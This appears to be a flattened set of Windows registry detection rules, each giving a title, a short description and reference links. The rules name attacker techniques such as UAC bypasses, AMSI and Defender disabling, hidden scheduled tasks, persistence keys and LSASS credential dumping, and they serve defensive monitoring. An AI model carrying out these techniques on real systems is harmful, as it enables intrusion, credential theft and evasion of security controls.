Terminal Server Client Connection History Cleared - Registry Detects the deletion of registry keys containing the MSTSC connection history https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer, http://woshub.com/how-to-clear-rdp-connections-history/, https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html
Removal Of AMSI Provider Registry Keys Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://seclists.org/fulldisclosure/2020/Mar/45
Removal of Potential COM Hijacking Registry Keys Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. https://github.com/OTRF/detection-hackathon-apt29/issues/7, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md, https://learn.microsoft.com/en-us/windows/win32/shell/launch, https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand, https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code
Removal Of Index Value to Hide Schedule Task - Registry Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query" https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
Removal Of SD Value to Hide Schedule Task - Registry Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
Creation of a Local Hidden User Account by Registry Sysmon registry detection of a local hidden user account. https://twitter.com/SBousseaden/status/1387530414185664538
Pandemic Registry Key Detects Pandemic Windows Implant https://wikileaks.org/vault7/#Pandemic, https://twitter.com/MalwareJake/status/870349480356454401
UAC Bypass Via Wsreset Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly, https://lolbas-project.github.io/lolbas/Binaries/Wsreset
CMSTP Execution Registry Event Detects various indicators of Microsoft Connection Manager Profile Installer execution https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
Disable Security Events Logging Adding Reg Key MiniNt Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events. https://twitter.com/0gtweet/status/1182516740955226112
Esentutl Volume Shadow Copy Service Keys Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
Wdigest CredGuard Registry Modification Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials. https://teamhydra.blog/2020/08/25/bypassing-credential-guard/
Windows Credential Editor Registry Detects the use of Windows Credential Editor (WCE) https://www.ampliasecurity.com/research/windows-credentials-editor/
HybridConnectionManager Service Installation - Registry Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. https://twitter.com/Cyb3rWard0g/status/1381642789369286662
Registry Entries For Azorult Malware Detects the presence of a registry key created during Azorult execution https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a
Potential Qakbot Registry Activity Detects a registry key used by IceID in a campaign that distributes malicious OneNote files https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
PrinterNightmare Mimikatz Driver Name Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760, https://www.lexjansen.com/sesug/1993/SESUG93035.pdf, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913, https://nvd.nist.gov/vuln/detail/cve-2021-1675, https://nvd.nist.gov/vuln/detail/cve-2021-34527
Path To Screensaver Binary Modified Detects value modification of registry key containing path to binary used as screensaver. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md, https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
Narrator's Feedback-Hub Persistence Detects abusing Windows 10 Narrator's Feedback-Hub https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
New DLL Added to AppCertDlls Registry Key Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/, https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html
NetNTLM Downgrade Attack - Registry Detects NetNTLM downgrade attack https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks, https://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers
New DLL Added to AppInit_DLLs Registry Key DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html
Office Application Startup - Office Test Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/
Windows Registry Trust Record Modification Alerts on trust record modification within the registry, indicating usage of macros https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/, http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html, https://twitter.com/inversecos/status/1494174785621819397
Registry Persistence Mechanisms in Recycle Bin Detects persistence registry keys for Recycle Bin https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf, https://persistence-info.github.io/Data/recyclebin.html, https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/
New PortProxy Registry Entry Added Detects the modification of the PortProxy registry key which is used for port forwarding. https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html, https://adepts.of0x.cc/netsh-portproxy-code/, https://www.dfirnotes.net/portproxy_detection/
RedMimicry Winnti Playbook Registry Manipulation Detects actions caused by the RedMimicry Winnti playbook https://redmimicry.com
WINEKEY Registry Modification Detects potential malicious modification of run keys by winekey or team9 backdoor https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
Run Once Task Configuration in Registry Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup https://twitter.com/pabraeken/status/990717080805789697, https://lolbas-project.github.io/lolbas/Binaries/Runonce/
Shell Open Registry Keys Manipulation Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) https://github.com/hfiref0x/UACME, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/, https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass, https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]
Security Support Provider (SSP) Added to LSA Configuration Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157
Potential Credential Dumping Via LSASS SilentProcessExit Technique Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/, https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
Sticky Key Like Backdoor Usage - Registry Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
Atbroker Registry Change Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/, https://lolbas-project.github.io/lolbas/Binaries/Atbroker/
Suspicious Run Key from Download Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/
DLL Load via LSASS Detects a method to load DLL via LSASS process using an undocumented Registry key https://blog.xpnsec.com/exploring-mimikatz-part-1/, https://twitter.com/SBousseaden/status/1183745981189427200
Suspicious Camera and Microphone Access Detects Processes accessing the camera and microphone from suspicious folder https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072
Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista
Registry Persistence via Service in Safe Mode Detects the modification of the registry to allow a driver or service to persist in Safe Mode. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network
Add Port Monitor Persistence in Registry Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md
Add Debugger Entry To AeDebug For Persistence Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes https://persistence-info.github.io/Data/aedebug.html, https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging
Allow RDP Remote Assistance Feature Detect enable rdp feature to allow specific user to rdp connect on the targeted machine https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
Potential AMSI COM Server Hijacking Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/, https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass
CurrentVersion Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
Common Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://persistence-info.github.io/Data/userinitmprlogonscript.html
Classes Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
CurrentControlSet Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
CurrentVersion NT Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Internet Explorer Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Office Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Session Manager Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
System Scripts Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
WinSock2 Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Wow6432Node CurrentVersion Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
Wow6432Node Classes Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
New BgInfo.EXE Custom DB Path Registry Configuration Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. Internal Research
Wow6432Node Windows NT CurrentVersion Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
New BgInfo.EXE Custom WMI Query Registry Configuration Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" Internal Research
New BgInfo.EXE Custom VBScript Registry Configuration Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" Internal Research
Bypass UAC Using Event Viewer Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd
Blackbyte Ransomware Registry BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/
Bypass UAC Using DelegateExecute Bypasses User Account Control using a fileless method https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand, https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute
Bypass UAC Using SilentCleanup Task Detects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task, https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/, https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign
Default RDP Port Changed to Non Standard Port Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller
IE Change Domain Zone Hides the file extension through modification of the registry https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries
Sysmon Driver Altitude Change Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650, https://youtu.be/zSihR3lTf7g
Change Winevt Channel Access Permission Via Registry Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel. https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/, https://learn.microsoft.com/en-us/windows/win32/api/winevt/, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/
Running Chrome VPN Extensions via the Registry 2 VPN Extension Running Chrome VPN Extensions via the Registry install 2 vpn extension https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension
ClickOnce Trust Prompt Tampering Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5, https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior
Potential CobaltStrike Service Installations - Registry Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395
COM Hijack via Sdclt Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute' http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass, https://www.exploit-db.com/exploits/47696
CrashControl CrashDump Disabled Detects disabling the CrashDump per registry (as used by HermeticWiper) https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/
Service Binary in Suspicious Folder Detect the creation of a service with a service binary located in a suspicious directory https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Custom File Open Handler Executes PowerShell Detects the abuse of custom file open handler, executing powershell https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728
Potential Registry Persistence Attempt Via DbgManagedDebugger Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/, https://github.com/last-byte/PersistenceSniper
Windows Defender Exclusions Added - Registry Detects the Setting of Windows Defender Exclusions https://twitter.com/_nullbind/status/1204923340810543109
Potentially Suspicious Desktop Background Change Via Registry Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image. https://www.attackiq.com/2023/09/20/emulating-rhysida/, https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/, https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html, https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI
Antivirus Filter Driver Disallowed On Dev Drive - Registry Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive". https://twitter.com/0gtweet/status/1720419490519752955
Hypervisor Enforced Code Integrity Disabled Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/, https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci
Hypervisor Enforced Paging Translation Disabled Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature. https://twitter.com/standa_t/status/1808868985678803222, https://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf
DHCP Callout DLL Installation Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
Disable Exploit Guard Network Protection on Windows Defender Detects disabling Windows Defender Exploit Guard Network Protection https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html
Disable Administrative Share Creation at Startup Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup
Disabled Windows Defender Eventlog Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2
Disable PUA Protection on Windows Defender Detects disabling Windows Defender PUA protection https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html
Disable Tamper Protection on Windows Defender Detects disabling Windows Defender Tamper Protection https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html
Potential AutoLogger Sessions Tampering Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging https://twitter.com/MichalKoczwara/status/1553634816016498688, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
Disable Microsoft Defender Firewall via Registry Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry
Disable Internal Tools or Feature in Registry Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md, https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions, https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage, https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl
Disable Macro Runtime Scan Scope Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/, https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope, https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba
Disable Privacy Settings Experience in Registry Detects registry modifications that disable Privacy Settings Experience https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md
Disable Windows Security Center Notifications Detect set UseActionCenterExperience to 0 to disable the Windows security center notification https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
Registry Disable System Restore Detects the modification of the registry to disable a system restore on the computer https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry
Windows Defender Service Disabled - Registry Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105
Disable Windows Firewall by Registry Detect set EnableFirewall to 0 to disable the Windows firewall https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md
Disable Windows Event Logging Via Registry Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel https://twitter.com/WhichbufferArda/status/1543900539280293889, https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp
Add DisallowRun Execution to Registry Detect set DisallowRun to 1 to prevent user running specific computer program https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
